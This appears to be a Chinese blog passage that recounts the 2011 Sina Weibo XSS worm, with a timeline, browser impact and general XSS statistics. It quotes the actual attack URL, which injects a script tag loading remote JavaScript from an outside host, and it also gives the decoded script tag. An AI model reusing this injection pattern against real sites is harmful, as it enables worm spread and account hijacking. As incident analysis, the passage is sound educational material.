在开始实例的讲解之前,先看一下xss的危害情况,第一张图中说明和xss相关的cve漏洞有7417个(http://web.nvd.nist.gov/view/vuln/search-results?query=xss&search_type=all&cves=on),第二张图说明在了乌云漏洞平台(www.wooyun.org)上和xss相关的漏洞有2360个,足见xss威力还是很大的。
这次举的例子是2011年6月28日新浪微博xss攻击事件
事件的经过线索如下:
20:14,开始有大量带v的认证用户中招转发蠕虫
20:30,2kt.cn中的病毒页面无法访问
20:32,新浪微博中hellosamy用户无法访问
21:02,新浪漏洞修补完毕
新浪微博事件是利用了微博广场页面 http://weibo.com/pub/star 的一个url注入了js脚本,其通过http://163.fm/pxzhoxn 短链接服务,将链接指向:http://weibo.com/pub/star/g/xyyyd%22%3e%3cscript%20src=//www.2kt.cn/images/t.js%3e%3c/script%3e?type=update
其中的地址为:< script src="//www.2kt.cn/images/t.js"></script>,下面附一张来自腾讯科技的配图,
当时大多数分析者认为 chrome 和 safari 都没中招,ie、firefox未能幸免。但ie8以后自动开启了xss防御,所以普通用户使用ie8以上版本和chrome以及safari还是能防范普通xss攻击的。